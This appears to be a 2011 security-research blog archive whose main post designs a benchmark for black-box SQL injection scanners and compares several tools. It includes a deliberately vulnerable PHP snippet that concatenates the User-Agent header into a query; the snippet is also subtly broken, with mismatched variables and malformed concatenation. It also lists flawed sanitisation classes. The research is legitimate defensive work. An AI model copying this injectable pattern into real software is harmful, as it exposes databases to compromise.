пятница, 19 августа 2011 г.

Building a benchmark for SQL injection scanners

Intro

In couple of last years we have seen a lot of emerging projects aiming at web application vulnerability analysis automation. That's right, I mean security scanners. Just to name a few: w3af, skipfish, Grendel-Scan, arachni, wapiti, SecuBat, sqlMap, hexjector, SQLiX and many more.

I like to group security scanners according to their feature sets:
  • general purpose vs special-purpose (testing for SQLi or XSS only);
  • detection only vs detection + exploitation.
Naturally, several good question arise:
  1. Is it true that special-purpose tools perform better than general-purpose ones?
  2. Is it true that commercial tools perform better than free ones?
  3. Is possible to find an ultimate champion for a certain vulnerability class (i.e. SQLi)? If no, which tools would produce the best result when combined together?
Our goal was to answer these question for a specific class of web application vulnerabilities, namely SQLi. The scope:
  1. We are not interested in second order SQLi vulnerabilities. Reason: there are no feasible techniques to detect second order SQLi in black box.
  2. We are not interested in crawling capabilities of the scanners.
  3. We are not interested in measuring exploitation capabilities.
In order to answer the questions we created a benchmark - a comprehensive set of vulnerable and non-vulnerable test cases, and tested several scanners against it.
This is the point you should ask:
- "Why the hell I should care? There was a lot of similar efforts. Do you provide a proof that your test set is complete or something?"1

In fact yes. Our approach is not an ad hoc. Let's take a look at it.
First of all we will outline the capabilities of the existing SQLi detection techniques. After that we will proceed to the discussion of problems arising during automation. Finally, we will present our approach for benchmarking of SQLi scanners.

Existing techniques for SQLi detections are not complete!

A black-box scanner does not have a lot of information channels to make its decisions about the presence or absence of vulnerabilities:
  • HTTP status code;
  • HTTP headers (i.e. Location, Set-cookie, etc.);
  • HTTP body;
  • HTTP response delay;
  • out-of-band channels.

According to its definition, SQLi vulnerability is a possibility to alter a syntactic structure of an SQL statement. The main idea behind existing black-box SQLi detection techniques is to inject just that statements which, when evaluated by back-end, would produce a change measurable from outside (alter status code, response body, delay, issue a DNS request, etc).
To sum the thins up, the community has come up with several SQLi detection techniques:
  • error-based;
  • content-based (or blind);
  • time-based;
  • out-of-band.

Alas, this set is not complete. Consider a code snippet, which extracts a user-agent value from HTTP request and stores it into back-end DBMS without validation:
$ua = $_SERVER["HTTP_USER_AGENT"];
$rs = mysql_query("SELECT id from user_agents WHERE user_agent = '.$ua.'");
$num_rows = mysql_num_rows($result);
if ($num_rows == 0) {
//insert ua into database
}

Furthermore, all possible exceptions are caught and suppressed and DBMS does not support functions like sleep (MS Access, for instance). [Forget about heavy queries either ;)] This means that we cannot influence from outside neither response itself nor response delay. But this may well be exploitable vulnerability (e.g. consider web-shell installation).
Now after we know that there are certain SQLi instances, which could not be detected by existing techniques in general, it is time to survey a potential for their automation.

Automation challenges

SQLi scanner developers face two main challenges:
  1. An injected input should leave the whole query syntactically correct. Thus, a scanner should somehow infer the injection point (e.g. tell a difference between an injection into column-name in a SELECT statement, and an injection after the LIMIT keyword).
  2. An algorithm for page comparison should tell apart a true and a false page when doing a blind SQLi. This is an easy task for a human with cognitive comprehension, and almost impossible in general case for a machine. Current web applications may have irregular page structure and produce different content in response to identical http requests (ads, social widgets, etc.), which make the situation even worse.

Our approach

The idea behind our approach is to establish a classification of all possible implementations of a single web application module interacting with a database. After that we would be able to produce all possible modules (or scripts if you like), which would make a test set. Why do we need classification anyways? Well, to reason about test set completeness, of course.

At the current level of abstraction we define five steps which typically constitute a common web application module:
  1. Get user input.
  2. Validate user input.
  3. Construct a query.
  4. Perform a query and handle the result.
  5. Construct and issue an HTTP response.

We then took a closer look into each step and enumerated all possible ways of its implementation.
Here's what we got.

Classification of environments

Criteria №1: DBMS and version.
Classes: all possible DBMSes with versions.
Reason: a set of features of an SQL dialect is determined by DBMS version. Almost every new major DBMS version is shipped with new built-in functions, which could be used in SQLi attack vectors.
Current implementation: supports only MySQL 5.0.

Criteria №2: exception suppression settings.
Classes: exceptions suppressed, exceptions not suppressed.
Comment: this is an environment setting; thus it does not relate to a possible try-catch block in a module.
Reason: this criteria allows to measure the implementation of error-based technique.
Current implementation: via PHP display_errors setting.

Criteria №3: execution time limit settings.
Classes: limited to 1 second, unlimited.
Reason: this criteria allows to check whether a scanner implements both time-based and blind SQLi detection techniques and is able to determine the correct one to use.
Current implementation: Not implemented. Planned: PHP max_execution_time setting.

Classification of the "Get user input" step

Criteria №4: location of the payload.
Classes: GET-parameter name, GET-parameter value, URL path component, POST-parameter name, POST-parameter value, cookie parameter name, cookie parameter value, header name, header value.
Reason: the scanner should be capable to inject payloads not only into GET and POST parameters, but also into cookies and other headers as well.
Current implementation: only one GET parameter is used to obtain user input.

Classification of the "Validate user input" step

Criteria №5: maximum length enforcement.
Classes: user-defined lengths, unlimited length.
Reason: a scanner should strive to make its probe vectors as tiny as possible.
Current implementation: a test bench operator can alter this limit accordingly. By default is set to 32.

Criteria №6: sanitization approach.
Classes:
proper escaping (prepared statement or built-in escaping function);
improper usage of built-in escaping facilities;
manual escaping:
- of single quotes;
- of double quotes;
- of slashes;
manual removal:
- of single quotes;
- of double quotes;
- of slashes;
- of SQL whitespaces;
- of SQL delimiters;
- of SQL keywords;
manual regexp-like check with error generation:
- of single quotes;
- of double quotes;
- of slashes;
- of SQL whitespaces;
- of SQL delimiters;
- of SQL keywords.
In fact, to obtain all classes from the latter three bullets (manual handling) we should get all permutations of them.
Reason: a perfect scanner should be able to bypass any flawed input validation.
Current implementation: proper escaping (mysql_real_escape_string inside quotes), improper usage of built-in escaping facilities (mysql_real_escape_string for numbers), manual escaping of single quotes, manual escaping of double quotes, manual escaping of all quotes, manual removal of all quotes, manual removal of SQL whitespaces.

Classification of the "Construct a query" step

Criteria №7: An injection point.
Classes: all possible injection points according to DBMS documentation.
Reason: a perfect scanner should be able to detect SQLi in all query types.
Current implementation:
- after the SELECT keyword in the field list:
- inside/without backquotes;
- inside brackets (nesting levels - 1, 2, 3);
- as a last or middle (including first) argument for the SQL function;
- in the WHERE clause:
- in a string/numeric literal;
- inside brackets (nesting levels - 1, 2, 3);
- in the left/right part of a condition ($id=id vs id=$id);
- as a last or middle (including first) argument for the SQL function;
- after the ORDER BY/GROUP BY in the field name
- inside/without backquotes;
- after the ORDER BY/GROUP BY in an expression (ORDER BY `price` * $discount*…) - in a string/numeric literal;
- inside brackets (nesting levels - 1, 2, 3);
- as a last or middle (including first) argument for the SQL function;
- after the ORDER BY/GROUP BY in a sort order ASC/DESC (ORDER BY `price` $style)

Classification of the "Perform a query and handle the result" step

Criteria №8: expected result.
Classes: result is not expected (DML queries), one field expected, one row expected, multiple rows expected.
Reason: an expected result type influences how a scanner should detect a potential SQLi. For example, of query result is discarded it is useless to alter the result set using boolean conditions (blind SQLi).
Current implementation: result is not expected (DML queries), one field expected, one row expected, multiple rows expected.

Criteria №9: error handling.
Classes: error results in a different page (no DBMS error message), error results in a page with DBMS error message, error is suppressed silently.
Reason: scanners should switch to blind or error-based technique accordingly.
Current implementation: implemented.

Classification of the "Construct and issue an HTTP response" step

Criteria №10: which response part depends on the SQL result.
Classes: status code, header, text within body, markup within body.
Reason: a perfect scanner should detect changes after successful injection in any part of HTTP response.
Current implementation: Location header, text within body, markup within body.

Criteria №11: response stability.
Classes: stable, unstable text, unstable initial DOM (before js evaluation), unstable resulting DOM (after js evaluation).
Reason: a perfect scanner should detect changes after successful injection in any part of HTTP response regardless of DOM stability (ads, social widgets, etc.).
Current implementation: stable, unstable text, unstable initial DOM.

The resulting test set would be a complete permutation of the classes. For example, there is among the others a test case with:
C1: MySQL 5.0 backend;
C2: suppressed exceptions;
C3: unlimited execution time;
C4: a test module would get input from the GET parameter value;
C5: without maximum length enforcement;
C6: with improper used mysql_real_escape_string (for numbers);
C7: as a first string argument inside a built-in function after ORDER BY keyword;
C8: one row would be expected;
C9: errors are silently suppressed;
C10: a query result determines a redirection destination (i.e. the value of the Location header);
C11: the response (redirection) is stable except the Date header.

Implementation

We have implemented our test bench as virtual machine containing web server, PHP interpreter, test generator, and result analyzer. It can be downloaded from here.
Currently the generator creates 27680 test cases (both vulnerable and not vulnerable). A test case is a PHP file, which receives one GET-parameter. There's also an index file, which links all test cases. This index file would be a starting point for scanners.
We have also implemented wrappers for several scanners: sqlmap, skipfish, wapiti, w3af. These wrappers with a specially designed scheduler allowed us to run several scanner instances in parallel, from the VM localhost.
Please, referer to the README files inside the archive for further information about the environment and its usage.

Evaluation

Here's just a small portion of the overall table.
 Positives (vulnerable)False positives (not vulnerable)Positives with unstable responseFalse positives with unstable response
Total16224114562016840
sqlmap 0.8-11128229576229
skipfish 1.81b10937378237
wapiti 2.2.1111515813443
acunetix7395010030
w3af 1.0-rc5133161981572126

Comments on the numbers:
  • The score is not normalized; thus, it is not correct to determine the best scanner as a scanner with the highest score. For example, the most of the test cases are the ones with unsuppressed errors. Thus, a scanner, which would perform best with error-based SQLi detection technique would have a more chances to get the highest overall score. This is the case with Wapiti.
  • The main feature of out test bench is that it allows to get scores for custom classes of test cases, once the scanner have done a run. For example, you could define a class "blind SQLi after ORDER BY keyword" and re-compute the results for this class. For the time being I refrained to dig into interpretation of more granular classes of the test cases.

Just a few facts.
Sqlmap 0.8:
- does not detect SQLi with output into HTTP headers;
- lacks intelligence with unstable output;
– fails on tests with SQLi into table fields surrounded in backquotes.

Skipfish 1.81b:
- does not detect SQLi with output into HTTP headers;
- lacks intelligence with unstable output;
- low false positive rate.

Wapiti 2.2.1:
- only error-based and time-based techniques are implemented;
– fails on tests with SQLi into table fields surrounded in backquotes;
– fails on tests with SQLi inside nested brackets.

Acunetix 7.0.0:
- zero false positives;
- often fails to detect SQLi with output into HTTP headers;
- often fails to detect time based SQLi even if it was successful;
- not so good with non error-based techniques.

w3af 1.0-rc5:
- best implementation of error-based technique;
- often fails if the normal query returns zero rows (as with login pages).

Outro

More analytics - in a few weeks.
Care to contribute in extending test classes? YOU ARE WELCOME! Contact us! There's so much to be done!

Side note #1: one of the most comprehensive surveys is one made by Shay Chen. If you haven't checked it out yet - you should!!!

Credits:
Karim Valiev - implementation of benchmark environment, classification.
Andrew Petukhov - main idea and classification.

понедельник, 25 июля 2011 г.

Detecting Insufficient Access Control in Web Applications

Two weeks ago we attended the 1st SysSec Workshop and DIMVA conference at Amsterdam. We presented there our paper entitled "Detecting Insufficient Access Control in Web Applications". We were surprised to see so many people at the workshop (as far as I'm concerned this workshop received a larger audience than DIMVA itself!).
Well, great events and great people. Many thanks go to the organizers, especially to Herbert Bos, who had made this event happen.

Here comes some stuff we had prepared for the workshop:
- A presentation:
It can be downloaded here.

- A paper "Detecting Insufficient Access Control in Web Applications".

- Source code of our tool is available for checkout at Google Code.

четверг, 2 июня 2011 г.

The 1st SysSec Workshop

Our paper "Detecting Insufficient Access Control in Web Applications" was accepted for the First SysSec Workshop.

This work is a follow-up research based on the OWASP Access Control Rules Tester project, which was initiated during the OWASP Summer of Code 2008.

If any of you guys happen to attend DIMVA'11 at Amsterdam, I'd be very glad to meet for a beer :)

Acknowledgements. I'd like to thank George Noseevich, who have put so much effort into this project and this paper.

суббота, 9 апреля 2011 г.

Comments on the talk made by Rafal Los (HP) about business logic flaws at Blackhat

Recently I've stumbled upon a talk on business logic vulnerabilites (whitepaper available here) made by Rafal Los at BlackHat Europe. Being a guy personally interested in the topic I decided to share my thoughts (rather critical) on the subject. I have divided my thoughts into two categories.

Inaccuracy in wordings and definitions.
1. The definition of business logic flaw is too general to be useful.
"A defect that exposes the component business processes or component flows to manipulation from the attacker perspective to achieve unintended and undesirable consequences from the design perspective; without disrupting the general function or continuity of the application."
Well, almost every application uses a so-called internal state to carry out its operations. In general, every web application workflow is a sequence of computational steps. Each computational step can be guarded by a predicate on the internal state. Hence, modification of internal state can alter a web application workflow by enabling other computational steps or disabling particular ones within it. Thus, every flaw in web application, which could be used to alter the internal state of web application may lead to attacks satisfying the definition presented by Rafal. SQL injection is the best example here.

2. 'Taxonomy' is a wrong word.
The confusion starts from the point where Rafal has introduced the term "taxonomy". Talking about taxonomies is dangerous. One have to prove the properties of the proposed taxonomy or at least try to. Rafal introduces a taxonomy of business logic flaws which consists of two classes. Neither criteria which were used to create those classes, nor a classification procedure were provided.
After all, Rafal is mixing several terms: a vulnerability (which is an enabling property of a software for a successful attack), an attack (one of the possible manifestations of an exploitable flaw) and a goal of an attack (what an attacker wishes to achieve). The same goal could be achieved through different vulns; a single vuln could be exploited for different goals. Rafal ties the first class of business logic flaws to "privilege manipulation", which is a goal. IMO this is wrong approach - this goal could be achieved through different attacks (and underlying vulns): SQLi (login bypass through injection), forceful browsing or even server misconfiguration. How does these relate to business logic?
The same applies to the second class, which is "Transaction Control Manipulation".
Finally, OWASP Top 10 is not a taxonomy and never meant to be. It is just an ordered list.

Doubts related to the proposed ideas
A method intended to find business logic flaws should operate in terms of the business domain and application logic. Hence, the first problem, which should be solved, is mapping of a set of possible interactions with web applications into use cases (which would be the basis for further analysis). It is not possible to automate this step without specification (not to mention technical issues like form submissions & captchas).
Ok, let's suppose we have solved the first problem. Now the second question is: how does the proposed approach differ from the known Q&A methods like fault injection, tests mutations, etc? Could you point out the added value of the proposed approach?

Final words
And in the end I'd like to point out the previous researches in the area, which Rafal hadn't mentioned in his white-paper:
- Differential analysis and its variants. This technique was described in several sources [1], [2], [3] and was designed for finding improper access control implementations. This means that from the methodological point of view the problem of detecting improper access control is already solved. Btw, some of these ideas were implemented in IBM AppScan, AFAIK.
- "Toward Automated Detection of Logic Vulnerabilities in Web Applications". A good example of how business logic flaws could be formalized. Not a black-box approach though.
- "Multi-Module Vulnerability Analysis of Web-based Applications". An example of how a notion of "intended workflow" could be formalized. Not a black-box approach though.

References
[1] J. Scambray and M. Shema, Hacking exposed: Web applications. McGraw-Hill Osborne Media, 2002.
[2] O. Segal, “Automated testing of privilege escalation in web applications,” Watchfire, 2006.
[3] D. Stuttard and M. Pinto, The Web Application Hacker’s Handbook: Discovering and Exploiting Security Flaws. Wiley Publishsing, 2007.

воскресенье, 27 февраля 2011 г.

ruCTF'2011 Quals

Well, our CTF team Bushwhackers took the first place in the ruCTF'2011 Qualification game. I'd like to congratulate all the team members with this victory. Wishing the same luck in the Final.

I'd also like to thank the organization team for their efforts.

Here's some evidences of our team at work:

воскресенье, 23 января 2011 г.

Web application scanner comparison efforts

It's been three months since we started a project, which aims at benchmarking SQLI scanners. Although our project is far from the finish, I've decided to share articles and postings by other researches who had undertaken similar efforts. Publications are sorted in order of appearance.
  1. Andreas Wiegenstein, Frederik Weidemann, Dr. Markus Schumacher, Sebastian Schinzel. Web Application Vulnerability Scanners – a Benchmark. Published in October 2006.

  2. Larry Suto. Analyzing the Effectiveness and Coverage of Web Application Security Scanners. Published in October 2007. And responses to it by Ory Segal (IBM) and by Jeff Forristal (HP).

  3. Anantasec. Web Application Scanners Comparison. Published in January 2007.

  4. Larry Suto. Analyzing the Accuracy and Time Costs of Web Application Security Scanners. And responses to it by Acunetix, NT Objectives, Jeremiah Grossman and HP. Published in February 2010.

  5. Jason Bau, Elie Bursztein, Divij Gupta, John Mitchell. State of the Art: Automated Black-Box Web Application Vulnerability Testing. Published in May 2010.

  6. Adam Doupe, Marco Cova, and Giovanni Vigna. Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners. Published in July 2010.

  7. Shay Chen. Web Application Scanners Accuracy Assessment. Published in December 2010.

Out of list, but still related work.

среда, 5 января 2011 г.

Deutsche Post Security Cup

Recently our team Bushwhackers participated in the Deutsche Post Security Cup.

The Cup Results are as follows:
- the first place took the RUB team from Ruhr University Bochum led by famous Mario Heiderich (see also FluxFingers team); I would recommend to check a site created and maintained by him - http://html5sec.org/. Congratulations! Good job, guys!
- we took the second place.
- the third place took UK Hax team.

I would like to thank Security Cup organization team including (but not limited to) Karsten Nohl, Ralph Zwierzina and personally Sascha May. Great job! See you in Moscow ;)